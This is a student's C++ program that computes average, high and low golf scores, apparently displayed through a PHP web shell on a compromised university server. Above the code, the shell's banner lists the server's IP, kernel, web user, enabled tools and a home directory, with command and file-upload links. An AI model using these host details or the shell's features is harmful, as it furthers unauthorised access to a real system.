Server IP : 172.16.15.8 / Your IP : 18.220.242.160 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/cchansen/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
// Test corrections Golf Scores // Written by Caitlin Hansen #include <iostream> #include <iomanip> using namespace std; int main () { int score, hiscore, loscore, totalscore, numscores; float avgscore; // Input the first score cin >> score; // Initialize the variables numscores = 0; totalscore = 0; hiscore = -1; loscore = 500; cout << "\n\tGolf Scores"; cout << "\n\t-----------"; // Loop through the grades in the file until -1 is detected while(score != -1) { // Count the score numscores += 1; // Add score to the running total totalscore += score; cout << endl; cout << "\t\t" << score << endl; // Check for highest score if(score >= hiscore) hiscore = score; // Check for lowest score if(score <= loscore) loscore = score; // Input the next score cin >> score; } // Calculate the average score avgscore = static_cast<float>(totalscore) / numscores; // Display the average score, the highest score and the lowest score cout << "\n\nThe average score is: " << setw(4) << avgscore; cout << "\n\nThe lowest score is: " << setw(4) << loscore; cout << "\n\nThe highest score is: " << setw(4) << hiscore; cout << "\n\n"; return 0; }